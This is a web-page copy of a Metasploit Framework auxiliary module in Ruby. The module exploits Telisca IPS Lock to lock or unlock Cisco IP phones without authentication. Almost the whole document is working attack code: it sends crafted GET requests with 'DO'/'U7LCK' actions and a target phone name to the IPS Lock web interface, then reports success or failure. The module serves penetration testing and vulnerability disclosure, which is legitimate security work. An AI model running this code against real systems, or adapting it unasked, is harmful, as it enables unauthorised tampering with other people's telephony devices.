CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/voip/telisca_ips_lock_control.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Telisca IPS Lock Cisco IP Phone Control',

12
      'Description'    => %q{

13
        This module allows an unauthenticated attacker to exercise the

14
        "Lock" and "Unlock" functionality of Telisca IPS Lock for Cisco IP

15
        Phones. This module should be run in the VoIP VLAN, and requires

16
        knowledge of the target phone's name (for example, SEP002497AB1D4B).

17


18
        Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.

19
      },

20
      'References'     =>

21
        [

22
          # Publicly disclosed via Metasploit PR

23
          'URL', 'https://github.com/rapid7/metasploit-framework/pull/6470'

24
        ],

25
      'Author'         =>

26
        [

27
          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',

28
          'zirsalem'

29
        ],

30
      'License'        => MSF_LICENSE,

31
      'DisclosureDate' => '2015-12-17',

32
      'Actions'        =>

33
       [

34
         ['LOCK', 'Description' => 'To lock a phone'],

35
         ['UNLOCK', 'Description' => 'To unlock a phone']

36
       ],

37
       'DefaultAction' => 'UNLOCK'

38
    ))

39


40
    register_options(

41
      [

42
        OptAddress.new('RHOST', [true, 'The IPS Lock IP Address']),

43
        OptString.new('PHONENAME', [true, 'The name of the target phone'])

44
      ])

45


46
  end

47


48
  def print_status(msg='')

49
    super("#{peer} - #{msg}")

50
  end

51


52
  def print_good(msg='')

53
    super("#{peer} - #{msg}")

54
  end

55


56
  def print_error(msg='')

57
    super("#{peer} - #{msg}")

58
  end

59


60
  # Returns the status of the listening port.

61
  #

62
  # @return [Boolean] TrueClass if port open, otherwise FalseClass.

63
  def port_open?

64
    begin

65
      res = send_request_raw({'method' => 'GET', 'uri' => '/'})

66
      return true if res

67
    rescue ::Rex::ConnectionRefused

68
      vprint_status("Connection refused")

69
    rescue ::Rex::ConnectionError

70
      vprint_error("Connection failed")

71
    rescue ::OpenSSL::SSL::SSLError

72
      vprint_error("SSL/TLS connection error")

73
    end

74


75
    false

76
  end

77


78
  # Locks a device.

79
  #

80
  # @param phone_name [String] Name of the phone used for the pn parameter.

81
  #

82
  # @return [void]

83
  def lock(phone_name)

84
    res = send_request_cgi({

85
      'method'    => 'GET',

86
      'uri'       => '/IPSPCFG/user/Default.aspx',

87
      'headers'   => {

88
        'Connection' => 'keep-alive',

89
        'Accept-Language' => 'en-US,en;q=0.5'

90
      },

91
      'vars_get'  => {

92
        'action'  => 'DO',

93
        'tg' => 'L',

94
        'pn' => phone_name,

95
        'dp' => '',

96
        'gr' => '',

97
        'gl' => ''

98
      }

99
    })

100


101
    if res && res.code == 200

102
      if res.body.include?('Unlock') || res.body.include?('U7LCK')

103
        print_good("The device #{phone_name} is already locked")

104
      elsif res.body.include?('unlocked') || res.body.include?('Locking') || res.body.include?('QUIT')

105
        print_good("Device #{phone_name} successfully locked")

106
      end

107
    elsif res

108
      print_error("Unexpected response #{res.code}")

109
    else

110
      print_error('The connection timed out while trying to lock.')

111
    end

112
  end

113


114


115
  # Unlocks a phone.

116
  #

117
  # @param phone_name [String] Name of the phone used for the pn parameter.

118
  #

119
  # @return [void]

120
  def unlock(phone_name)

121
    res = send_request_cgi({

122
      'method'    => 'GET',

123
      'uri'       => '/IPSPCFG/user/Default.aspx',

124
      'headers'   => {

125
        'Connection' => 'keep-alive',

126
        'Accept-Language' => 'en-US,en;q=0.5'

127
      },

128
      'vars_get' => {

129
        'action' => 'U7LCK',

130
        'pn'     => phone_name,

131
        'dp'     => ''

132
      }

133
    })

134


135
    if res && res.code == 200

136
      if res.body.include?('Unlock') || res.body.include?('U7LCK')

137
        print_good("The device #{phone_name} is already locked")

138
      elsif res.body.include?('unlocked') || res.body.include?('QUIT')

139
        print_good("The device #{phone_name} successfully unlocked")

140
      end

141
    elsif res

142
      print_error("Unexpected response #{res.code}")

143
    else

144
      print_error('The connection timed out while trying to unlock')

145
    end

146
  end

147


148


149
  def run

150
    unless port_open?

151
      print_error('The web server is unreachable!')

152
      return

153
    end

154


155
    phone_name = datastore['PHONENAME']

156
    case action.name

157
      when 'LOCK'

158
        lock(phone_name)

159
      when 'UNLOCK'

160
        unlock(phone_name)

161
    end

162
  end

163
end

164


165